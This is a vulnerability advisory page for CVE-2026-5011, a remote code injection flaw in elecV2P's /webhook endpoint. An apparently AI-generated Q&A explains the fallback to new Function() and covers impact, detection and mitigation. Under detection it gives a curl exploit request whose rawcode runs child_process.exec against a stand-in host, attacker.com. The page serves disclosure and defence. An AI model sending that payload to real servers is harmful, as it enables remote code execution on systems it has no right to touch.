CVE-2026-5011
Remote Code Injection in elecV2P JSON Parser (runJSFile
Publication date: 2026-03-28
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| elecv2 | elecv2p | to 3.8.3 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5011 is a Remote Code Execution (RCE) vulnerability in the elecV2P application, specifically in its `/webhook` endpoint. The vulnerability occurs because the endpoint accepts a parameter called `rawcode` which is passed directly to a function named `runJSFile()` for execution.
The vulnerability arises from unsafe handling of the `rawcode` parameter. The application tries to parse input strings as JSON, but if parsing fails, it falls back to evaluating the string as JavaScript code using `new Function()`. This fallback allows attackers to inject and execute arbitrary JavaScript code remotely.
An attacker can exploit this by sending a specially crafted request with malicious JavaScript code in the `rawcode` parameter, which can include system-level commands executed via Node.js modules like `child_process`. This enables full remote code execution on the affected system.
How can this vulnerability impact me? :
This vulnerability allows an attacker to remotely execute arbitrary code on the affected system running elecV2P. This means an attacker can run any commands they choose, potentially taking full control of the system.
- Execution of malicious scripts or commands leading to data theft or destruction.
- Installation of malware or backdoors for persistent access.
- Disruption of services or system operations.
- Compromise of sensitive information or credentials stored on the system.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for requests to the `/webhook` endpoint that include the `rawcode` parameter, especially POST requests containing JavaScript code execution attempts.
A practical detection method involves checking for suspicious POST requests with a valid webhook token and the `type` parameter set to `jsrun`, `runjs`, or `runscript` that carry encoded JavaScript payloads.
Example commands to detect exploitation attempts include:
- Using tcpdump or tshark to capture HTTP POST requests to `/webhook` endpoint: tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep '/webhook'
- Using curl or similar tools to manually test the endpoint with a crafted payload (requires a valid token):
- curl -X POST http://target/webhook -d '{"token":"<valid_token>","type":"jsrun","rawcode":"require('child_process').exec('ping attacker.com')"}'
Additionally, reviewing server logs for requests containing the `rawcode` parameter or unusual JavaScript execution attempts can help detect exploitation.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or disabling access to the `/webhook` endpoint, especially from untrusted networks.
Ensure that the webhook token (`CONFIG.wbrtoken`) is strong, unique, and kept secret to prevent unauthorized access.
If possible, temporarily disable the functionality that executes JavaScript code from the `rawcode` parameter or apply input validation to prevent unsafe code execution.
Monitor network traffic and logs for suspicious activity related to the `/webhook` endpoint and block IP addresses exhibiting exploit attempts.
Since the project has not yet responded with a patch, consider isolating the affected service or applying firewall rules to limit exposure until an official fix is released.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
CVE-2026-5011 is a remote code execution vulnerability that allows attackers to execute arbitrary system commands via the elecV2P application's /webhook endpoint. This can lead to unauthorized access, data manipulation, or data exfiltration.
Such unauthorized access and potential data breaches can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.
Because the vulnerability enables remote code execution without proper validation, it increases the risk of data compromise, which may result in violations of data protection requirements and lead to legal and regulatory consequences.